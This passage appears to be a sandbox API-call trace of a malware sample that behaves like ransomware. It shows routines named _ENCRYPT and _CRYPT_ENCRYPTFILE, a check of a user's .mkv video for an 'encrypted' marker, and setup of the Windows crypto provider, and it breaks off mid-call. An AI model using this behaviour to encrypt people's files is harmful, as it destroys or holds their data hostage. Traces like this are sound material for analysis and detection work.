RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cb08 [0043.287] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af608 [0043.287] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CloseHandle", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0043.287] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xc) returned 0x889988 [0043.287] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CloseHandle", cchWideChar=12, lpMultiByteStr=0x889988, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CloseHandle", lpUsedDefaultChar=0x0) returned 12 [0043.287] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889988 | out: hHeap=0x770000) returned 1 [0043.287] GetProcAddress (hModule=0x76e10000, lpProcName="CloseHandle") returned 0x76e21410 [0043.287] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cb08 | out: hHeap=0x770000) returned 1 [0043.287] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af608 | out: hHeap=0x770000) returned 1 [0043.287] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b0ce8 [0043.287] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af608 [0043.287] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af608 | out: hHeap=0x770000) returned 1 [0043.287] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b0ce8 | out: hHeap=0x770000) returned 1 [0043.287] CloseHandle (hObject=0x140) returned 1 [0043.288] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af608 [0043.288] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x214) returned 0x7b8158 [0043.288] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af558 [0043.288] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cb08 [0043.288] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889988 [0043.288] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce20 [0043.288] FreeLibrary (hLibModule=0x76e10000) returned 1 [0043.288] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4f8 | out: hHeap=0x770000) returned 1 [0043.288] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b13f0 | out: hHeap=0x770000) returned 1 [0043.288] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889430 | out: hHeap=0x770000) returned 1 [0043.288] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af338 | out: hHeap=0x770000) returned 1 [0043.288] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c880 | out: hHeap=0x770000) returned 1 [0043.288] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889b08 | out: hHeap=0x770000) returned 1 [0043.288] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd90 | out: hHeap=0x770000) returned 1 [0043.288] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cce8 | out: hHeap=0x770000) returned 1 [0043.288] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c9b8 | out: hHeap=0x770000) returned 1 [0043.288] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cbb0 | out: hHeap=0x770000) returned 1 [0043.288] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ccb8 | out: hHeap=0x770000) returned 1 [0043.288] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889610 | out: hHeap=0x770000) returned 1 [0043.288] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8898c8 | out: hHeap=0x770000) returned 1 [0043.288] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1328 | out: hHeap=0x770000) returned 1 [0043.288] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cb08 | out: hHeap=0x770000) returned 1 [0043.288] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889988 | out: hHeap=0x770000) returned 1 [0043.288] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af558 | out: hHeap=0x770000) returned 1 [0043.288] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b8158 | out: hHeap=0x770000) returned 1 [0043.288] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af608 | out: hHeap=0x770000) returned 1 [0043.288] PeekMessageW (in: lpMsg=0x6aedfc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aedfc) returned 0 [0043.288] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="no", cchCount1=2, lpString2="no", cchCount2=2) returned 2 [0043.288] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889988 | out: hHeap=0x770000) returned 1 [0043.288] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889928 | out: hHeap=0x770000) returned 1 [0043.288] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ae928 | out: hHeap=0x770000) returned 1 [0043.289] PeekMessageW (in: lpMsg=0x6af21c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6af21c) returned 0 [0043.289] CharUpperBuffW (in: lpsz="_ENCRYPT", cchLength=0x8 | out: lpsz="_ENCRYPT") returned 0x8 [0043.289] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0043.289] CharUpperBuffW (in: lpsz="_GETFILEEXT", cchLength=0xb | out: lpsz="_GETFILEEXT") returned 0xb [0043.289] PeekMessageW (in: lpMsg=0x6aea94, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aea94) returned 0 [0043.289] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="v", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0043.289] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="kv", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0043.289] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="mkv", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0043.289] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".mkv", cchCount1=1, lpString2=".", cchCount2=1) returned 2 [0043.289] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0043.289] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0043.289] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0043.289] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\_mHpWJR_Yl93 b\\oOAw\\02DcEZB-wigQKJ.mkv", lpFindFileData=0x6ae8c0 | out: lpFindFileData=0x6ae8c0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8b738d40, ftCreationTime.dwHighDateTime=0x1d5c26c, ftLastAccessTime.dwLowDateTime=0xf00cb540, ftLastAccessTime.dwHighDateTime=0x1d5bef4, ftLastWriteTime.dwLowDateTime=0xf00cb540, ftLastWriteTime.dwHighDateTime=0x1d5bef4, nFileSizeHigh=0x0, nFileSizeLow=0x1667f, dwReserved0=0x0, dwReserved1=0x777648, cFileName="02DcEZB-wigQKJ.mkv", cAlternateFileName="02DCEZ~1.MKV")) returned 0x7c20c0 [0043.289] FindClose (in: hFindFile=0x7c20c0 | out: hFindFile=0x7c20c0) returned 1 [0043.289] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0043.289] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\_mHpWJR_Yl93 b\\oOAw\\02DcEZB-wigQKJ.mkv", lpFindFileData=0x6ae8c0 | out: lpFindFileData=0x6ae8c0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8b738d40, ftCreationTime.dwHighDateTime=0x1d5c26c, ftLastAccessTime.dwLowDateTime=0xf00cb540, ftLastAccessTime.dwHighDateTime=0x1d5bef4, ftLastWriteTime.dwLowDateTime=0xf00cb540, ftLastWriteTime.dwHighDateTime=0x1d5bef4, nFileSizeHigh=0x0, nFileSizeLow=0x1667f, dwReserved0=0x0, dwReserved1=0x777648, cFileName="02DcEZB-wigQKJ.mkv", cAlternateFileName="02DCEZ~1.MKV")) returned 0x7c20c0 [0043.289] FindClose (in: hFindFile=0x7c20c0 | out: hFindFile=0x7c20c0) returned 1 [0043.290] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0043.290] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\"C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\_mHpWJR_Yl93 b\\oOAw\\02DcEZB-wigQKJ.mkv\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0043.290] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\_mHpWJR_Yl93 b\\oOAw\\02DcEZB-wigQKJ.mkv\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0043.290] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=":\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\_mHpWJR_Yl93 b\\oOAw\\02DcEZB-wigQKJ.mkv\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0043.290] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\_mHpWJR_Yl93 b\\oOAw\\02DcEZB-wigQKJ.mkv\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0043.290] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Users\\5p5NrGJn0jS HALPmcxz\\Videos\\_mHpWJR_Yl93 b\\oOAw\\02DcEZB-wigQKJ.mkv\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0043.290] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="sers\\5p5NrGJn0jS HALPmcxz\\Videos\\_mHpWJR_Yl93 b\\oOAw\\02DcEZB-wigQKJ.mkv\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0043.290] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ers\\5p5NrGJn0jS HALPmcxz\\Videos\\_mHpWJR_Yl93 b\\oOAw\\02DcEZB-wigQKJ.mkv\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0043.290] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="rs\\5p5NrGJn0jS HALPmcxz\\Videos\\_mHpWJR_Yl93 b\\oOAw\\02DcEZB-wigQKJ.mkv\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0043.290] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="s\\5p5NrGJn0jS HALPmcxz\\Videos\\_mHpWJR_Yl93 b\\oOAw\\02DcEZB-wigQKJ.mkv\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0043.290] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\5p5NrGJn0jS HALPmcxz\\Videos\\_mHpWJR_Yl93 b\\oOAw\\02DcEZB-wigQKJ.mkv\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0043.290] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="5p5NrGJn0jS HALPmcxz\\Videos\\_mHpWJR_Yl93 b\\oOAw\\02DcEZB-wigQKJ.mkv\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0043.290] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="p5NrGJn0jS HALPmcxz\\Videos\\_mHpWJR_Yl93 b\\oOAw\\02DcEZB-wigQKJ.mkv\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0043.290] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="5NrGJn0jS HALPmcxz\\Videos\\_mHpWJR_Yl93 b\\oOAw\\02DcEZB-wigQKJ.mkv\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0043.290] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="NrGJn0jS HALPmcxz\\Videos\\_mHpWJR_Yl93 b\\oOAw\\02DcEZB-wigQKJ.mkv\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0043.290] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="rGJn0jS HALPmcxz\\Videos\\_mHpWJR_Yl93 b\\oOAw\\02DcEZB-wigQKJ.mkv\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0043.290] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="GJn0jS HALPmcxz\\Videos\\_mHpWJR_Yl93 b\\oOAw\\02DcEZB-wigQKJ.mkv\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0043.290] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Jn0jS HALPmcxz\\Videos\\_mHpWJR_Yl93 b\\oOAw\\02DcEZB-wigQKJ.mkv\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0043.290] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="n0jS HALPmcxz\\Videos\\_mHpWJR_Yl93 b\\oOAw\\02DcEZB-wigQKJ.mkv\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0043.290] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="0jS HALPmcxz\\Videos\\_mHpWJR_Yl93 b\\oOAw\\02DcEZB-wigQKJ.mkv\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0043.290] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="jS HALPmcxz\\Videos\\_mHpWJR_Yl93 b\\oOAw\\02DcEZB-wigQKJ.mkv\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0043.290] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="S HALPmcxz\\Videos\\_mHpWJR_Yl93 b\\oOAw\\02DcEZB-wigQKJ.mkv\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0043.290] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=" HALPmcxz\\Videos\\_mHpWJR_Yl93 b\\oOAw\\02DcEZB-wigQKJ.mkv\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0043.290] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="HALPmcxz\\Videos\\_mHpWJR_Yl93 b\\oOAw\\02DcEZB-wigQKJ.mkv\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0043.290] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ALPmcxz\\Videos\\_mHpWJR_Yl93 b\\oOAw\\02DcEZB-wigQKJ.mkv\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0043.290] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="LPmcxz\\Videos\\_mHpWJR_Yl93 b\\oOAw\\02DcEZB-wigQKJ.mkv\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0043.290] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Pmcxz\\Videos\\_mHpWJR_Yl93 b\\oOAw\\02DcEZB-wigQKJ.mkv\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0043.290] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="mcxz\\Videos\\_mHpWJR_Yl93 b\\oOAw\\02DcEZB-wigQKJ.mkv\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0043.290] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="cxz\\Videos\\_mHpWJR_Yl93 b\\oOAw\\02DcEZB-wigQKJ.mkv\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0043.290] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="xz\\Videos\\_mHpWJR_Yl93 b\\oOAw\\02DcEZB-wigQKJ.mkv\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0043.290] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="z\\Videos\\_mHpWJR_Yl93 b\\oOAw\\02DcEZB-wigQKJ.mkv\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0043.291] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\Videos\\_mHpWJR_Yl93 b\\oOAw\\02DcEZB-wigQKJ.mkv\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0043.291] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Videos\\_mHpWJR_Yl93 b\\oOAw\\02DcEZB-wigQKJ.mkv\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0043.291] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ideos\\_mHpWJR_Yl93 b\\oOAw\\02DcEZB-wigQKJ.mkv\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0043.291] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="deos\\_mHpWJR_Yl93 b\\oOAw\\02DcEZB-wigQKJ.mkv\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0043.291] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="eos\\_mHpWJR_Yl93 b\\oOAw\\02DcEZB-wigQKJ.mkv\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0043.291] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="os\\_mHpWJR_Yl93 b\\oOAw\\02DcEZB-wigQKJ.mkv\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0043.291] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="s\\_mHpWJR_Yl93 b\\oOAw\\02DcEZB-wigQKJ.mkv\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0043.291] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\_mHpWJR_Yl93 b\\oOAw\\02DcEZB-wigQKJ.mkv\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0043.291] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="_mHpWJR_Yl93 b\\oOAw\\02DcEZB-wigQKJ.mkv\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0043.291] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="mHpWJR_Yl93 b\\oOAw\\02DcEZB-wigQKJ.mkv\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0043.291] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="HpWJR_Yl93 b\\oOAw\\02DcEZB-wigQKJ.mkv\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0043.291] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="pWJR_Yl93 b\\oOAw\\02DcEZB-wigQKJ.mkv\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0043.291] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="WJR_Yl93 b\\oOAw\\02DcEZB-wigQKJ.mkv\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0043.291] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="JR_Yl93 b\\oOAw\\02DcEZB-wigQKJ.mkv\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0043.291] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="R_Yl93 b\\oOAw\\02DcEZB-wigQKJ.mkv\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0043.291] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="_Yl93 b\\oOAw\\02DcEZB-wigQKJ.mkv\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0043.291] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Yl93 b\\oOAw\\02DcEZB-wigQKJ.mkv\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0043.291] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="l93 b\\oOAw\\02DcEZB-wigQKJ.mkv\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0043.291] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="93 b\\oOAw\\02DcEZB-wigQKJ.mkv\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0043.291] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="3 b\\oOAw\\02DcEZB-wigQKJ.mkv\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0043.291] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=" b\\oOAw\\02DcEZB-wigQKJ.mkv\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0043.291] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="b\\oOAw\\02DcEZB-wigQKJ.mkv\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0043.291] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\oOAw\\02DcEZB-wigQKJ.mkv\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0043.291] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="oOAw\\02DcEZB-wigQKJ.mkv\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0043.291] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="OAw\\02DcEZB-wigQKJ.mkv\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0043.291] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Aw\\02DcEZB-wigQKJ.mkv\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0043.291] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="w\\02DcEZB-wigQKJ.mkv\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0043.291] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\02DcEZB-wigQKJ.mkv\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0043.291] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="02DcEZB-wigQKJ.mkv\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0043.291] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="2DcEZB-wigQKJ.mkv\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0043.291] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="DcEZB-wigQKJ.mkv\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0043.291] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="cEZB-wigQKJ.mkv\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0043.291] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="EZB-wigQKJ.mkv\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0043.291] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ZB-wigQKJ.mkv\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0043.291] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="B-wigQKJ.mkv\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0043.291] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="-wigQKJ.mkv\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0043.292] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="wigQKJ.mkv\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0043.292] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="igQKJ.mkv\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0043.292] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="gQKJ.mkv\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0043.292] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0043.292] CharUpperBuffW (in: lpsz="_CRYPT_ENCRYPTFILE", cchLength=0x12 | out: lpsz="_CRYPT_ENCRYPTFILE") returned 0x12 [0043.292] CharUpperBuffW (in: lpsz="_GETFILENAMEEXEXT", cchLength=0x11 | out: lpsz="_GETFILENAMEEXEXT") returned 0x11 [0043.292] PeekMessageW (in: lpMsg=0x6aeb54, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb54) returned 0 [0043.292] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="v", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0043.292] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="kv", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0043.292] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="mkv", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0043.292] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".mkv", cchCount1=1, lpString2=".", cchCount2=1) returned 2 [0043.292] PeekMessageW (in: lpMsg=0x6aeb54, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb54) returned 0 [0043.292] PeekMessageW (in: lpMsg=0x6aeb54, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb54) returned 0 [0043.292] PeekMessageW (in: lpMsg=0x6aeb54, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb54) returned 0 [0043.292] PeekMessageW (in: lpMsg=0x6aeb54, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb54) returned 0 [0043.292] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\_mHpWJR_Yl93 b\\oOAw\\02DcEZB-wigQKJ.mkv", lpFindFileData=0x6ae7b8 | out: lpFindFileData=0x6ae7b8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8b738d40, ftCreationTime.dwHighDateTime=0x1d5c26c, ftLastAccessTime.dwLowDateTime=0xf00cb540, ftLastAccessTime.dwHighDateTime=0x1d5bef4, ftLastWriteTime.dwLowDateTime=0xf00cb540, ftLastWriteTime.dwHighDateTime=0x1d5bef4, nFileSizeHigh=0x0, nFileSizeLow=0x1667f, dwReserved0=0x6ae908, dwReserved1=0x777648, cFileName="02DcEZB-wigQKJ.mkv", cAlternateFileName="02DCEZ~1.MKV")) returned 0x7c2100 [0043.292] FindClose (in: hFindFile=0x7c2100 | out: hFindFile=0x7c2100) returned 1 [0043.292] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0043.292] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0043.292] LoadLibraryW (lpLibFileName="Advapi32.dll") returned 0x754b0000 [0043.293] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLESET", cchLength=0x14 | out: lpsz="__CRYPT_DLLHANDLESET") returned 0x14 [0043.293] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0043.293] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0043.293] CryptAcquireContextA (in: phProv=0x6ae498, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x6ae498*=0x7d5c40) returned 1 [0043.294] CharUpperBuffW (in: 